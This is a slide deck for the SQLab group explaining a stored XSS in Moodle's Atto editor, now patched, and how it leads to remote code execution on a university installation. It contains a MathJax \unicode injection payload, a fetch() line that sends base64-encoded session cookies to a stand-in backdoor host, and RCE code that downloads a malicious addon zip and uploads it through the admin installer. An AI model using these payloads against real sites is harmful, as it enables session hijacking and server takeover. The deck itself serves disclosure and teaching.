Moodle Stored XSS (2020-05-28)

# Moodle Stored XSS (2020-05-28) Sean for SQLab --- ## New E3 is Moodle-based ![](https://i.imgur.com/Oxl5JkH.png) ---- ## Atto HTML Editor in Moodle - Supports limited HTML tags/attrs & LaTeX ![](https://i.imgur.com/MvS3wC0.png) ---- ## HTML in Atto Editor - Only whitelisted tags allowed (e.g. `<code>`, `<img>`, `<p>`, etc.) - Only whitelisted attributes allowed (e.g. `style`, `src`, etc.) - Classical XSS methods such as `<svg onload="...">` do not work. ---- ## Atto has LaTeX Support! ![](https://i.imgur.com/GZYDQP4.png) --- ## MathJax A JavaScript display engine for math. e.g. `$$ \LaTeX $$` $$ \LaTeX $$ ---- ## MathJax `$$ \unicode{ <img src="x" onerror="alert('XSS')"> } $$` ![](https://i.imgur.com/48ygQIh.png) --- ## XSS Exploits ---- ## Cookie is not HttpOnly ```javascript > console.log(document.cookie); "MoodleSession=qkfif2nbel9pp2th2egorjclh4; \ AMCVS_8E929CC25A1FB2B30A495C97%40AdobeOrg=1; \ PHPSESSID=lp0sfm5hobpaj1uhcg1uv4gfj7" ``` ![](https://i.imgur.com/kUsK6ZH.png) ---- ## No CSP Headers ```cmake HTTP/1.1 200 OK Content-Security-Policy: connect-src <source>; ``` We can simply use `fetch()` to retrieve secrets in most users' browsers. ```javascript var c = document.cookie; var url = `https://example.com/backdoor?cookie=${btoa(c)}`; fetch(url); ``` --- ## RCE using XSS ```javascript const URL = 'https://e3new.nctu.edu.tw/'; fetch(URL + 'admin/tool/installaddon/index.php', { credentials: 'include', }) .then(res => res.text()) .then(data => { // parse data and get necessary parameters let sesskey = ... let clientid = ... const rce_file = 'https://example.com/rce.zip'; fetch(rce_file) .then(res => res.blob()) .then(blob => { // upload blob as addon file }); }); ``` ###### Modified from: [rce_moodle.js](http://sandbox.ahussam.me/rce_moodle.js) --- ## Timeline | Date | Link | | --- | --- | | 2020-05-06 | [Patched](http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-68430) | | 2020-05-18 | [Security Announcement](https://moodle.org/mod/forum/discuss.php?d=403512) | | 2020-05-26 | [Blog Published](https://github.com/ahussam/Moodle-xss-to-rce-exploit) | | 2020-05-28 | Today (Fixed) | ---- ## Fixed in New E3 ![](https://i.imgur.com/V3prTBq.png) ---- ## References - [Moodle DOM Stored XSS to RCE](https://cube01.io/blog/Moodle-DOM-Stored-XSS-to-RCE.html)